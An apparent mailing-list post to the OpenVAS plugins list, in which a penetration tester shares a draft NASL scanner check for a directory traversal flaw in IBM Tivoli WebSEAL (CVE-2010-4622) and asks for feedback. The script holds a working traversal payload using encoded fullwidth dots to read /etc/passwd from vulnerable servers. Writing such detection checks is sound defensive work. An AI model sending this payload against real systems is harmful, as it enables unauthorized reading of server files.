Recently, I saw a year old bug get exploited in a pen test and was wondering
why it hadn't been found in previous scans. When I did some looking, I
wasn't able to find a check for it so I attempted to write my own. It is a
bug that effects IBM TAM WebSeal and while some reports show it only working
AIX, I saw it work on other *nix platforms and I saw code execution work.
I attempted to look through documentation and looked at other files to
figure out how to write one of these things. One thing that still confuses
me is that I want the check on both port 80 and 443, but I'm not sure I'm
doing that part right. Please feel free to shred it up, I'm hoping to learn
more through this. There are still some lines in there I'm using for
debugging.
-------------------
if( description )
{
script_id(33333);
script_version ("$Revision:0.1$");
script_name(english:"IBM Tivoli Access Manager for e-business WebSEAL URL
Traversal Arbitrary File Access");
desc =
"There is a directory traversal flaw in WebSEAL versions <= 6.1.1. Some
reports show it only affecting AIX, but
testing has shown other operating systems to be vulnerable and code
execution has been shown to work.
Risk Factor : High";
script_description(desc);
script_summary(english:"WebSEAL traversal check");
script_category(ACT_GATHER_INFO);
script_family(english:"Remote file access");
script_copyright(english:"This script is Copyright (C) 2011 name");
script_cve_id("CVE-2010-4622");
script_dependencie("http_version.nasl");
script_require_ports("Services/www", 80, 443);
exit(0);
}
include ("http_func.inc");
include ("http_keepalive.inc");
port = get_http_port(default:80);
if(!get_port_state(port))
{
port = get_http_port(default:443);
if(!get_port_state(port))
exit(0);
}
banner = get_http_banner(port:port);
serv = strstr(banner, "server");
if (serv == NULL) serv = strstr(banner, "Server");
display(serv);
if (!ereg(pattern:"WebSEAL/[0-6].[0-1]",string:serv))
{
display("Not vulnerable\n");
exit(0);
}
dir_trav =
"/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e\%uff0e%uff0e/etc/passwd";
{
req = http_get(item: dir_trav, port:port);
res = http_keepalive_send_recv(port:port, data:req);
if (res == NULL) exit(0);
if (ereg(pattern:"HTTP/[0-9]\.[0-9] 200 ", string:res))
{
display(res);
security_hole(port);
exit(0);
}
}
_______________________________________________
Openvas-plugins mailing list
[email protected]
http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins
